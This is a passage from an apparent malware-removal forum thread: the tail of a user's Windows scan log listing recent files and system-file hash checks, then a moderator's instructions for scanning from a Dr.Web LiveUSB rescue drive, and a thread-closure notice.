2013-12-10 18:52 - 2013-10-13 22:47 - 00004974 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for WOLFLING-Jon Lowry Wolfling
2013-12-10 18:51 - 2013-12-10 18:51 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\MFAData
2013-12-10 18:50 - 2013-12-10 18:50 - 04436952 _____ (AVG Technologies) C:\Users\Jon Lowry\Downloads\avg_isct_stb_all_2014_4259.exe
2013-12-10 18:48 - 2009-07-13 20:45 - 00023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2013-12-10 18:48 - 2009-07-13 20:45 - 00023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2013-12-10 18:43 - 2013-12-10 18:43 - 00003758 _____ C:\Windows\System32\Tasks\AutoKMS
2013-12-10 18:41 - 2013-12-10 18:55 - 00471285 _____ C:\Users\Jon Lowry\Downloads\avgremover.log
2013-12-10 18:41 - 2013-09-06 14:42 - 00000000 ___RD C:\Users\Jon Lowry\Dropbox
2013-12-10 18:41 - 2013-09-05 00:05 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\Dropbox
2013-12-10 18:40 - 2013-12-10 18:40 - 00000296 _____ C:\Windows\PFRO.log
2013-12-10 18:40 - 2013-12-10 18:40 - 00000112 _____ C:\Windows\setupact.log
2013-12-10 18:40 - 2013-12-10 18:40 - 00000000 _____ C:\Windows\setuperr.log
2013-12-10 18:40 - 2011-06-10 17:33 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2013-12-10 18:40 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2013-12-10 18:38 - 2013-04-13 13:35 - 00000000 ____D C:\Users\Jon Lowry\Desktop\Carla's stuff
2013-12-10 18:36 - 2013-12-10 18:36 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\{29FDA4EE-C07E-46A6-884F-DB0975D8892B}
2013-12-10 17:27 - 2012-08-10 13:22 - 00000944 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000UA.job
2013-12-10 17:19 - 2011-06-10 17:33 - 00000904 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2013-12-10 00:24 - 2013-12-10 00:24 - 00012015 _____ C:\Users\Jon Lowry\Downloads\[kickass.to]the.sound.of.music.1965.720p.brrip.x264.yify.torrent
2013-12-10 00:24 - 2013-12-10 00:24 - 00012015 _____ C:\Users\Jon Lowry\Downloads\[kickass.to]the.sound.of.music.1965.720p.brrip.x264.yify (1).torrent
2013-12-09 23:13 - 2013-05-20 13:55 - 00000348 _____ C:\Windows\Tasks\HPCeeScheduleForJon Lowry.job
2013-12-09 22:35 - 2013-02-02 10:43 - 00000000 ____D C:\Users\Jon Lowry\Desktop\Books - pdf epub mobi
2013-12-09 22:35 - 2011-06-17 17:52 - 00000000 ____D C:\Users\Jon Lowry\Documents\Family Tree Maker
2013-12-09 20:10 - 2011-03-31 12:16 - 00000000 ____D C:\Users\Jon Lowry\Documents\My eBooks
2013-12-09 19:51 - 2011-11-22 06:06 - 00000000 _____ C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2013-12-09 19:51 - 2011-02-14 16:15 - 00000052 _____ C:\Windows\SysWOW64\DOErrors.log
2013-12-09 19:40 - 2012-03-01 13:57 - 00000000 ____D C:\Users\Jon Lowry\Documents\Calibre Library
2013-12-09 01:33 - 2013-06-02 20:00 - 00000000 ____D C:\Users\Jon Lowry\Desktop\School
2013-12-09 01:29 - 2013-06-14 02:09 - 00000000 ____D C:\Users\Jon Lowry\Desktop\Recipe sites
2013-12-09 01:21 - 2013-05-31 01:08 - 00000000 ____D C:\Users\Jon Lowry\Desktop\Jon's Desktop Files
2013-12-09 01:13 - 2013-10-05 21:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2013-12-08 22:39 - 2013-12-08 22:39 - 00003191 _____ C:\Users\Jon Lowry\Downloads\[kickass.to]divergent.trilogy.epub.tgfb.torrent
2013-12-08 22:38 - 2013-12-08 22:38 - 00004948 _____ C:\Users\Jon Lowry\Downloads\Veronica+Roth+Divergent+1-2.torrent
2013-12-08 22:38 - 2013-12-08 22:38 - 00004948 _____ C:\Users\Jon Lowry\Downloads\Veronica+Roth+Divergent+1-2 (1).torrent
2013-12-08 12:10 - 2009-07-13 21:13 - 00006710 _____ C:\Windows\system32\PerfStringBackup.INI
2013-12-07 18:27 - 2013-08-21 12:56 - 00000000 ____D C:\AdwCleaner
2013-12-07 18:20 - 2013-10-30 19:55 - 00000000 ____D C:\ProgramData\330ef0a6613c069d
2013-12-07 18:18 - 2013-12-07 18:18 - 01110034 _____ C:\Users\Jon Lowry\Desktop\AdwCleaner.exe
2013-12-07 18:18 - 2013-12-07 18:18 - 01034531 _____ (Thisisu) C:\Users\Jon Lowry\Desktop\JRT.exe
2013-12-07 18:11 - 2013-12-07 18:11 - 01034531 _____ (Thisisu) C:\Users\Jon Lowry\Downloads\JRT.exe
2013-12-07 18:10 - 2009-07-13 21:08 - 00032610 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2013-12-07 18:05 - 2009-09-06 17:57 - 00000000 ____D C:\Windows\Panther
2013-12-06 15:44 - 2013-11-29 22:46 - 00000000 ____D C:\Users\Jon Lowry\Documents\Visual Studio 2010
2013-12-06 15:41 - 2013-12-06 15:41 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\AVAST Software
2013-12-06 15:39 - 2013-12-06 15:39 - 01032416 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00409832 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00334648 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2013-12-06 15:39 - 2013-12-06 15:39 - 00205320 _____ C:\Windows\system32\Drivers\aswVmm.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00092544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00084328 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00065776 _____ C:\Windows\system32\Drivers\aswRvrt.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00065264 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2013-12-06 15:39 - 2013-12-06 15:39 - 00038984 _____ (AVAST Software) C:\Windows\system32\Drivers\aswFsBlk.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00003924 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2013-12-06 15:39 - 2013-12-06 15:39 - 00001966 _____ C:\Users\Public\Desktop\avast! Free Antivirus.lnk
2013-12-06 15:38 - 2013-12-06 15:38 - 00000000 ____D C:\Program Files\AVAST Software
2013-12-06 15:36 - 2013-12-06 15:36 - 00000000 ____D C:\ProgramData\AVAST Software
2013-12-06 15:14 - 2013-12-06 14:53 - 00000071 _____ C:\Windows\avast5.ini
2013-12-06 15:12 - 2011-07-05 00:57 - 00000000 ____D C:\ProgramData\Microsoft Help
2013-12-06 15:11 - 2013-02-07 00:19 - 00000000 ____D C:\Qoobox
2013-12-06 15:09 - 2013-12-06 15:09 - 00602112 _____ (OldTimer Tools) C:\Users\Jon Lowry\Desktop\OTL.exe
2013-12-06 15:06 - 2013-12-06 15:06 - 00000000 ____D C:\Users\Default\Documents\Visual Studio 2010
2013-12-06 15:06 - 2013-12-06 15:06 - 00000000 ____D C:\Users\Default User\Documents\Visual Studio 2010
2013-12-06 15:04 - 2013-07-11 03:13 - 00000000 ____D C:\Windows\system32\MRT
2013-12-06 15:04 - 2009-07-13 18:34 - 95944704 _____ C:\Windows\system32\config\software.bak
2013-12-06 15:04 - 2009-07-13 18:34 - 19922944 _____ C:\Windows\system32\config\system.bak
2013-12-06 15:04 - 2009-07-13 18:34 - 01835008 _____ C:\Windows\system32\config\default.bak
2013-12-06 15:04 - 2009-07-13 18:34 - 00065536 _____ C:\Windows\system32\config\sam.bak
2013-12-06 15:04 - 2009-07-13 18:34 - 00028672 _____ C:\Windows\system32\config\security.bak
2013-12-06 15:03 - 2013-12-06 15:03 - 00045892 _____ C:\ComboFix.txt
2013-12-06 15:03 - 2012-12-08 11:16 - 00000000 ____D C:\Windows\erdnt
2013-12-06 14:58 - 2011-02-02 11:59 - 82896128 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2013-12-06 14:58 - 2009-07-13 18:34 - 00000513 _____ C:\Windows\win.ini
2013-12-06 14:52 - 2009-07-13 18:34 - 00000215 _____ C:\Windows\system.ini
2013-12-06 00:10 - 2012-08-14 15:07 - 00000000 ____D C:\Users\Jon Lowry\.android
2013-12-06 00:09 - 2013-12-06 00:09 - 00000000 _____ C:\Users\Jon Lowry\daemonprocess.txt
2013-12-06 00:09 - 2011-01-23 02:18 - 00000000 ____D C:\Users\Jon Lowry
2013-12-06 00:04 - 2013-12-06 00:04 - 00001109 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2013-12-06 00:04 - 2013-08-23 20:49 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2013-12-06 00:00 - 2012-03-01 13:57 - 00000000 ____D C:\Program Files (x86)\Calibre2
2013-12-05 23:56 - 2013-12-06 00:09 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\cache
2013-12-05 16:18 - 2013-11-01 22:17 - 00000000 ____D C:\Users\Jon Lowry\Documents\Outlook Files
2013-12-04 21:08 - 2013-11-05 16:20 - 00000000 ____D C:\Users\Jon Lowry\Desktop\Credit
2013-12-04 14:27 - 2012-08-10 13:22 - 00000922 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000Core.job
2013-12-04 14:13 - 2013-12-04 14:13 - 00288663 _____ C:\Users\Jon Lowry\Downloads\sqlite3.dll
2013-12-03 19:51 - 2013-04-23 20:07 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\Spotify
2013-12-03 19:44 - 2013-04-23 20:07 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Spotify
2013-12-02 22:16 - 2011-01-24 11:22 - 00026598 _____ C:\ProgramData\hpzinstall.log
2013-12-02 22:13 - 2013-12-02 22:13 - 00000000 ____D C:\Users\Jon Lowry\Documents\Fax
2013-12-02 22:11 - 2013-12-02 22:10 - 00172693 ____N C:\Windows\hpoins46.dat
2013-12-02 21:58 - 2011-01-24 11:24 - 00000000 ____D C:\Program Files (x86)\HP
2013-12-02 14:12 - 2013-10-30 19:54 - 00000000 ____D C:\ProgramData\InstallMate
2013-12-02 13:34 - 2013-09-12 15:16 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\uPlayer
2013-12-02 13:33 - 2011-01-23 02:27 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Hewlett-Packard
2013-12-02 11:13 - 2013-05-20 13:55 - 00003210 _____ C:\Windows\System32\Tasks\HPCeeScheduleForJon Lowry
2013-12-02 00:07 - 2013-08-10 00:30 - 00000000 ____D C:\Users\Jon Lowry\Desktop\ACN
2013-11-29 23:14 - 2011-06-10 17:33 - 00003900 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2013-11-29 23:14 - 2011-06-10 17:33 - 00003648 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2013-11-29 23:00 - 2013-11-29 22:44 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 10.0
2013-11-29 22:56 - 2013-11-29 22:56 - 00000000 ____D C:\Windows\system32\RsFx
2013-11-29 22:56 - 2013-09-26 17:20 - 00000000 ____D C:\Program Files\Microsoft SQL Server
2013-11-29 22:55 - 2013-11-29 22:55 - 00000000 ____D C:\Program Files\Microsoft Visual Studio 9.0
2013-11-29 22:55 - 2013-11-29 22:55 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 9.0
2013-11-29 22:55 - 2013-09-26 17:21 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2013-11-29 22:55 - 2009-07-13 19:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2013-11-29 22:54 - 2013-11-29 22:54 - 00000000 ____D C:\Windows\SysWOW64\1033
2013-11-29 22:54 - 2013-11-29 22:54 - 00000000 ____D C:\Windows\system32\1033
2013-11-29 22:48 - 2013-11-29 22:48 - 00000000 ____D C:\Program Files\Microsoft Synchronization Services
2013-11-29 22:48 - 2013-11-29 22:48 - 00000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2013-11-29 22:48 - 2013-11-29 22:48 - 00000000 ____D C:\Program Files (x86)\Microsoft Synchronization Services
2013-11-29 22:48 - 2010-07-15 11:19 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server Compact Edition
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Windows\symbols
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Program Files\Microsoft Visual Studio 10.0
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Program Files\Microsoft Help Viewer
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Program Files (x86)\Microsoft SDKs
2013-11-28 00:31 - 2011-05-28 21:59 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\.minecraft
2013-11-27 23:46 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\system32\NDF
2013-11-27 00:33 - 2013-11-27 00:33 - 00000000 ____D C:\Recovery
2013-11-26 00:32 - 2011-01-29 10:22 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Cyberlink
2013-11-26 00:26 - 2011-02-09 15:27 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Windows Live
2013-11-26 00:25 - 2013-11-26 00:25 - 00001227 _____ C:\Users\Public\Desktop\WinX DVD Author.lnk
2013-11-26 00:25 - 2013-11-26 00:25 - 00000000 ____D C:\Program Files (x86)\Digiarty
2013-11-26 00:25 - 2012-12-07 17:07 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\Digiarty
2013-11-20 21:54 - 2012-02-28 08:07 - 00000000 ____D C:\Program Files (x86)\Rhapsody
2013-11-20 21:50 - 2013-11-20 21:50 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\SketchUp
2013-11-20 21:28 - 2013-08-07 21:02 - 00000000 ____D C:\Users\Jon Lowry\Documents\Jared
2013-11-20 15:00 - 2011-11-30 01:19 - 00000000 ____D C:\Users\Jon Lowry\Documents\My Library
2013-11-17 23:57 - 2013-11-15 14:20 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\LogMeIn Rescue Applet
2013-11-17 23:57 - 2013-01-15 05:19 - 00692616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2013-11-17 23:57 - 2013-01-15 05:19 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2013-11-17 23:57 - 2011-05-18 04:22 - 00071048 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2013-11-17 23:57 - 2011-02-02 11:58 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Adobe
2013-11-17 23:43 - 2011-06-27 07:25 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\Skype
2013-11-16 16:28 - 2013-11-16 16:28 - 00675988 _____ C:\Users\Jon Lowry\Desktop\Minecraft.exe
2013-11-15 14:24 - 2011-06-27 07:33 - 00000000 ____D C:\Users\Jon Lowry\Documents\Youcam
2013-11-15 13:49 - 2013-11-15 13:49 - 00001991 _____ C:\Users\Public\Desktop\SEU Explorer.lnk
2013-11-15 13:49 - 2013-11-15 13:49 - 00001938 _____ C:\Users\Public\Desktop\SEU Design.lnk
2013-11-15 13:49 - 2013-11-15 13:49 - 00000000 ____D C:\Users\Public\Documents\Design Era Samples
2013-11-15 13:49 - 2013-11-15 13:01 - 00000000 ____D C:\ProgramData\Sierra
2013-11-15 13:46 - 2013-11-15 13:46 - 00000000 ____D C:\Program Files (x86)\Sierra
2013-11-15 13:46 - 2010-07-15 11:16 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2013-11-13 20:54 - 2013-05-31 01:08 - 00000000 ____D C:\Users\Jon Lowry\Desktop\Carla's Desktop Files
2013-11-10 15:59 - 2013-08-07 21:00 - 00000000 ____D C:\Users\Jon Lowry\Downloads\Jon's Stuff
2013-11-10 15:59 - 2013-07-31 22:59 - 00000000 ____D C:\Users\Jon Lowry\Documents\Taxes
2013-11-10 15:59 - 2013-05-08 17:18 - 00000000 ____D C:\Users\Jon Lowry\Downloads\Carla's Stuff

Files to move or delete:
====================
C:\Users\Jon Lowry\jagex_cl_loginapplet_LIVE.dat
C:\Users\Jon Lowry\jagex_cl_runescape_LIVE.dat
C:\Users\Jon Lowry\jagex_cl_runescape_LIVE1.dat
C:\Users\Jon Lowry\jagex_cl_runescape_LIVE2.dat
C:\Users\Jon Lowry\jagex_runescape_preferences.dat
C:\Users\Jon Lowry\jagex_runescape_preferences2.dat
C:\Users\Jon Lowry\random.dat


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2013-11-20 22:55

==================== End Of Log ============================
  • 0

#10
Essexboy

Essexboy

    GeekU Moderator

  • GeekU Moderator
  • 62,615 posts
Have you just run Combofix ? As there is a note there that is concerning me

Create an emergency repair USB drive:
Download Dr Web Live USB to your desktop
  • Connect a USB flash drive to the computer. Registering the plugging in event takes no more than 10 seconds.
  • Launch drwebliveusb.exe.
  • The program will detect available USB-devices automatically and prompt you to choose the one you?d like to use as an emergency repair drive. You can format the device if you like (a warning will be displayed before you proceed with formatting). In order to read the License agreement, follow a corresponding link found in the program window (the page containing the license agreement text will be loaded in your default browser).
    Posted Image
  • To create a bootable USB flash drive, press the Create Dr.Web LiveUSB button.
  • Files will be copied automatically.
  • Once the copying process is completed, press the Exit button to close the application.
  • Reboot the infected computer with the USB in the drive
  • Ensure that the first boot device is USB - If you are not sure about that then see this page for instructions
  • As loading starts, a dialogue window will prompt you to choose between the standard and safe modes.

    Posted Image
  • Use arrow keys to select DrWeb-LiveCD (Default)

    Posted Image
  • Press select objects for scanning

    Posted Image
  • When the system is loaded, check the disks or folders you want to scan, and click on Start.
  • The programme will now scan for and cure/delete any malware that it finds. Allow it to do so
    Posted Image
  • When it has completed

    Posted Image
  • Select Open Report and copy to the USB
  • Once completed reboot to normal windows, and attach the report here

  • 0

#11
Essexboy

Essexboy

    GeekU Moderator

  • GeekU Moderator
  • 62,615 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

featured